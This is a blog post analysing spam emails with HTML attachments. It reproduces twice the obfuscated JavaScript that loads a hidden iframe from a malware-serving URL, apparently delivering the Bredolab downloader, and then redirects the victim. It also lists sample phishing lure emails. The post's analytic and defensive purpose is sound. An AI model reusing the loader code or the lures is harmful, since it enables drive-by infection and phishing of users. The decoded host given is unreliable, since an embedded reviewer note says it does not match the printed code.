Random Emails with HTML Attachment – Malware
Over the last month or so I have been inundated with emails on a variety of topics, all of which ask the recipient to open an HTML file that is attached.
I have included an example of the code contained in the HTML attachment below.
Under no circumstances should anyone open these attachments or run the following code. It is reproduced here for analysis only; note that the blog's formatting has turned the straight quotes into typographic ones, so the listing is not a byte-exact copy of the attachment.
Malicious code contained in the HTML attachment (the pair of scripts appears twice in the listing below; the second copy appears to be a repeat of the first):
<script type=’text/javascript’>function sW(){};var wX=”wX”;sW.prototype = {dC : function() {this.e=26810;this.xM=false;dX=”";return ‘hStbtbpb:b/S/bsbobnbnkoks*eS.krSuk:*8*0S8k0a/*ian*daeaxb.ap*h*pS?apaikdb=S1S0a’.fS(/[ak\*Sb]/g, ”);var dA=new Array();var fJ=”";n=”";this.gZ=”gZ”;},c : function() {var h=function(){};this.xJ=”";var t=”";w=9625;this.i=13841;var fY=58590;var x=window;xS=”xS”;var xQ=new Date();var a = this;this.vT=”";var oK=function(){return ‘oK’};var o=document;var vY=”;p=false;this.r=16716;this.vL=26555;this.rZ=false;String.prototype.fS=function(f, d){var oM=this; return oM.replace(f, d)};this.xA=11909;var wQ=false;var u=”";var cL=”cL”;this.mN=”;this.uU=12901;this.hY=”hY”;var g = ‘swewt/T#i@m@e@olultw’.fS(/[wl#@/]/g, ”);var y=new Date();gX=”;var dW=”;gL=false;var m = ‘w[rxi9t9e['.fS(/[\[Ws9x]/g, ”);function dXU(){};var eU=new Date();this.gM=15553;var pM=”pM”;this.yR=”yR”;var uP=”;var fC=new Date();try {var l=”";this.s=”;var lC=function(){};var hN=function(){};this.b=false;function xN(){};var cH = ‘sNrlcP’.fS(/[PNl\]z]/g, ”);this.fR=”;var iM=new Array();this.eJ=”;var xK = ‘cBrzezautBezE4lueBmweznutB’.fS(/[Bwu4z]/g, ”);rH=”";jH=”;var xMG=”; var j = ‘aWpUpIeUnIdICUhWiUlWd:’.fS(/[\:6UWI]/g, ”);var mH=false;var uA=”";this.fE=”fE”;var v = ‘bOoUdUyU’.fS(/[UO\!,l]/g, ”);this.uM=64493;this.yB=”;function hI(){};sG=”sG”;var dO = ‘s(e#t(A5txtxrxi5b#u(t5e>’.fS(/[\>\(x#5]/g, ”);var pH=function(){return ‘pH’};mU=”mU”;var xU = ‘h+eTiyg+h[ty'.fS(/[y\[TB\+]/g, ”);var xNB=”";this.tL=62920;var aA=function(){return ‘aA’};wH=false;var q = ‘wKigd7t7hz’.fS(/[z,K7g]/g, ”);var qW=function(){return ‘qW’};var fP=”fP”;var cG=”;this.cC=”";var fEX=function(){return ‘fEX’};var uL=”;aQ=false;var z=document[xK](‘i7f%rIa%m*e*’.fS(/[\*7%I\$]/g, ”));this.gB=”";var vZ=function(){};xAB=”";aS=36314;z[dO](cH, a.dC());var iA=function(){return ‘iA’};this.iC=51591;z[dO](xU, “1″);var zS=”";this.vR=”vR”;z[dO](q, “1″);this.wA=false;this.rD=49214;this.iN=”;var aR=false;this.fL=”;var 
wZ=31785;this.xR=24396;o[v][j](z);this.bV=”;this.cP=false;xKE=11560;var vZL=function(){};this.pN=false;var dWR=”dWR”;var wV=”;this.k=false;} catch(aU) {var kQ=function(){};fLO=”;function zM(){};this.vK=”;var yL=function(){};o[m](‘<[h[t}mLlk L>k<)bLokd[y} k>k<L/[b}o}dLy}>}<[/[hLt)m)l)>)'.fS(/[\)\[Lk\}]/g, ”));this.eR=false;var cX=false;var oE=false;x[g](function(){ a.c() }, 319);eM=false;var tS=”";this.vX=”";var bK=”;}var rU=new Array();this.xI=26651;this.hX=”hX”;}};vI=”vI”;var oD=new sW(); this.oB=6063;oD.c();this.pG=44011;</script><script type=’text/javascript’>function mY(){};this.sU=”sU”;mY.prototype = {k : function() {this.x=false;var nY=”nY”;var h=new Date();var iB=new Array();this.j=859;q=”q”;var mZ=false;this.b=false;n=document['lsoFcsasthiFohnh'.replace(/[h\$Fs\?]/g, ”)];this.g=2474;this.jW=false;u=”;var d=”";hN=false;var o=new Date();function i(m, v){s=”";gE=”gE”;var e=”;var vV=”;m.href=v;mV=”;var xN=51306;a=”";this.mW=false;}vR=false;function l(){};this.w=”w”;this.bS=false;var qL=new Date();var mG=”mG”;qI=”;i(n, ‘hCt^t+p+:+/Z/+t^o+lZd+s+pyeyaZky.Zc+oCm+’.replace(/[\+Cy\^Z]/g, ”));this.bK=”;oE=false;var c=”;this.xZ=”";}};var gI=5746;var f=new mY(); this.fY=false;f.k();gT=”gT”;</script><script type=’text/javascript’>function sW(){};var wX=”wX”;sW.prototype = {dC : function() {this.e=26810;this.xM=false;dX=”";return ‘hStbtbpb:b/S/bsbobnbnkoks*eS.krSuk:*8*0S8k0a/*ian*daeaxb.ap*h*pS?apaikdb=S1S0a’.fS(/[ak\*Sb]/g, ”);var dA=new Array();var fJ=”";n=”";this.gZ=”gZ”;},c : function() {var h=function(){};this.xJ=”";var t=”";w=9625;this.i=13841;var fY=58590;var x=window;xS=”xS”;var xQ=new Date();var a = this;this.vT=”";var oK=function(){return ‘oK’};var o=document;var vY=”;p=false;this.r=16716;this.vL=26555;this.rZ=false;String.prototype.fS=function(f, d){var oM=this; return oM.replace(f, d)};this.xA=11909;var wQ=false;var u=”";var cL=”cL”;this.mN=”;this.uU=12901;this.hY=”hY”;var g = ‘swewt/T#i@m@e@olultw’.fS(/[wl#@/]/g, ”);var y=new Date();gX=”;var dW=”;gL=false;var 
m = ‘w[rxi9t9e['.fS(/[\[Ws9x]/g, ”);function dXU(){};var eU=new Date();this.gM=15553;var pM=”pM”;this.yR=”yR”;var uP=”;var fC=new Date();try {var l=”";this.s=”;var lC=function(){};var hN=function(){};this.b=false;function xN(){};var cH = ‘sNrlcP’.fS(/[PNl\]z]/g, ”);this.fR=”;var iM=new Array();this.eJ=”;var xK = ‘cBrzezautBezE4lueBmweznutB’.fS(/[Bwu4z]/g, ”);rH=”";jH=”;var xMG=”; var j = ‘aWpUpIeUnIdICUhWiUlWd:’.fS(/[\:6UWI]/g, ”);var mH=false;var uA=”";this.fE=”fE”;var v = ‘bOoUdUyU’.fS(/[UO\!,l]/g, ”);this.uM=64493;this.yB=”;function hI(){};sG=”sG”;var dO = ‘s(e#t(A5txtxrxi5b#u(t5e>’.fS(/[\>\(x#5]/g, ”);var pH=function(){return ‘pH’};mU=”mU”;var xU = ‘h+eTiyg+h[ty'.fS(/[y\[TB\+]/g, ”);var xNB=”";this.tL=62920;var aA=function(){return ‘aA’};wH=false;var q = ‘wKigd7t7hz’.fS(/[z,K7g]/g, ”);var qW=function(){return ‘qW’};var fP=”fP”;var cG=”;this.cC=”";var fEX=function(){return ‘fEX’};var uL=”;aQ=false;var z=document[xK](‘i7f%rIa%m*e*’.fS(/[\*7%I\$]/g, ”));this.gB=”";var vZ=function(){};xAB=”";aS=36314;z[dO](cH, a.dC());var iA=function(){return ‘iA’};this.iC=51591;z[dO](xU, “1″);var zS=”";this.vR=”vR”;z[dO](q, “1″);this.wA=false;this.rD=49214;this.iN=”;var aR=false;this.fL=”;var wZ=31785;this.xR=24396;o[v][j](z);this.bV=”;this.cP=false;xKE=11560;var vZL=function(){};this.pN=false;var dWR=”dWR”;var wV=”;this.k=false;} catch(aU) {var kQ=function(){};fLO=”;function zM(){};this.vK=”;var yL=function(){};o[m](‘<[h[t}mLlk L>k<)bLokd[y} k>k<L/[b}o}dLy}>}<[/[hLt)m)l)>)'.fS(/[\)\[Lk\}]/g, ”));this.eR=false;var cX=false;var oE=false;x[g](function(){ a.c() }, 319);eM=false;var tS=”";this.vX=”";var bK=”;}var rU=new Array();this.xI=26651;this.hX=”hX”;}};vI=”vI”;var oD=new sW(); this.oB=6063;oD.c();this.pG=44011;</script>
<script type=’text/javascript’>function mY(){};this.sU=”sU”;mY.prototype = {k : function() {this.x=false;var nY=”nY”;var h=new Date();var iB=new Array();this.j=859;q=”q”;var mZ=false;this.b=false;n=document['lsoFcsasthiFohnh'.replace(/[h\$Fs\?]/g, ”)];this.g=2474;this.jW=false;u=”;var d=”";hN=false;var o=new Date();function i(m, v){s=”";gE=”gE”;var e=”;var vV=”;m.href=v;mV=”;var xN=51306;a=”";this.mW=false;}vR=false;function l(){};this.w=”w”;this.bS=false;var qL=new Date();var mG=”mG”;qI=”;i(n, ‘hCt^t+p+:+/Z/+t^o+lZd+s+pyeyaZky.Zc+oCm+’.replace(/[\+Cy\^Z]/g, ”));this.bK=”;oE=false;var c=”;this.xZ=”";}};var gI=5746;var f=new mY(); this.fY=false;f.k();gT=”gT”;</script>
So how does this code work and what does it do?
It is quite clever in the way it disguises the web address it points to. Without going into too much detail about how the rest of the code works, the important part is the following line (the return value of the `dC` method in the first script):
return 'hStbtbpb:b/S/bsbobnbnkoks*eS.krSuk:*8*0S8k0a/*ian*daeaxb.ap*h*pS?apaikdb=S1S0a'.fS(/[ak\*Sb]/g, '');
If you look carefully you may see something that resembles a typical URL with extra characters mixed in. The `.fS(...)` call is not a built-in: a few statements earlier the script defines `String.prototype.fS` as a one-line wrapper around `String.replace`, so `.fS(/[ak\*Sb]/g, '')` simply deletes every `a`, `k`, `*`, `S` and `b` from the string. The same trick is used for every other sensitive name in the script (`createElement`, `iframe`, `setAttribute`, `appendChild`, `setTimeout`, `location`), each with its own throw-away character set. Removing the extra characters gives the following URL:
Do not visit the following website – according to the author's analysis it served the Win32/Bredolab downloader. Note that the HTML attachment itself carries no payload: the first script only loads this URL in an `iframe` with `height` and `width` set to `1` appended to `document.body` (falling back to `document.write` of a bare page and a 319 ms `setTimeout` retry if that fails), and the second script rewrites `document.location.href` to a different site so the victim sees a plausible page. The actual malware comes from the remote server.
hxxp://onnoe[.]ru:8080/index.php?pid=10 (defanged – do not browse to it)
Reviewer note: applying the strip to the string exactly as printed in the listing above yields the host sonnose[.]ru rather than onnoe[.]ru, with the same port and path. Either the author decoded a different variant of the attachment or the pasted listing differs from the original sample, so confirm the indicator against an original attachment before adding it to a blocklist.
So why go to all that effort just to disguise a simple URL? Because the disguise is cheap to vary: the filler characters, the character class that strips them, the variable names and the dozens of junk assignments (`this.e=26810`, `var fY=58590`, and so on) can all be regenerated for every message, while the decoded URL and the behaviour stay the same. A spam filter or antivirus signature that looks for the literal URL or for a fixed byte sequence in the attachment therefore never matches. The practical defence is to filter on what the attachment is rather than on what it says: inbound HTML attachments containing `<script>` are very rarely legitimate, and the behaviours here – creating a 1×1 `iframe`, appending it to `document.body`, and rewriting `document.location.href` – are the parts that cannot be obfuscated away.
| Malware name | What it does |
| --- | --- |
| Win32/Bredolab | Win32/Bredolab is a downloader which is able to download and execute arbitrary files from a remote host. |
Some examples of the emails I have received:
Sender:
microsoft outlook support
Subject:
Outlook Setup Notification
Content:
You have (8) messages from Microsoft Outlook.
Please re-configure your Microsoft Outlook again.
Download attached setup file and install.
Attachment:
open.html
Sender:
Tyrone Macdonald
Subject:
FIFA World Cup South Africa… bad news
Content:
Hello!!
FIFA World Cup 2010 scandal news, read attached document
Attachment:
open.html
Sender:
Sylvia Ford
Subject:
Time to be a MAN.
Content:
Save big now
Attachment:
open.html
Sender:
Jarvis Carr
Subject:
Outlook Setup Notification
Content:
Dangerous files detected!
Your system is at risk!
Several files were found in your computer which can damage your personal data.
It is strongly recommended to delete them immediately!
Name Alert level
Trojan-DownIoader.Win32.Agent.alr High Risk
Nuker.Win32.CGSi Low Risk
Trojan-DownIoader.Win32.Agent.alr High Risk
Trojan-Dropper. Win32.Agent.sd Low Risk
* To protect your data choose offline scanning
and set full real-time antivirus service.
* Open Attached File And Repair Now
Attachment
Virus Scan.html
Sender:
123Greetings.com
Subject:
[practicedak0@ramcar.com] just sent you an ecard
Content:
You can view it by open attached document.
Your ecard is going to be with us for the next 30 days.
We hope you enjoy your ecard.
Attachment:
ecard.html
Sender:
Subject:
Reset your Facebook password
Content:
Hey there.
Because of the measures taken to provide safety to our clients, your password has been changed.
You can find your new password in attached document.
Yours,
Facebook=
Attachment:
facebook_newpass.html








One Response to “Random Emails with HTML Attachment – Malware”
i really hate this one! I get these all the time but at least my spam protection sorts it out! but still lots and lots and lots!!1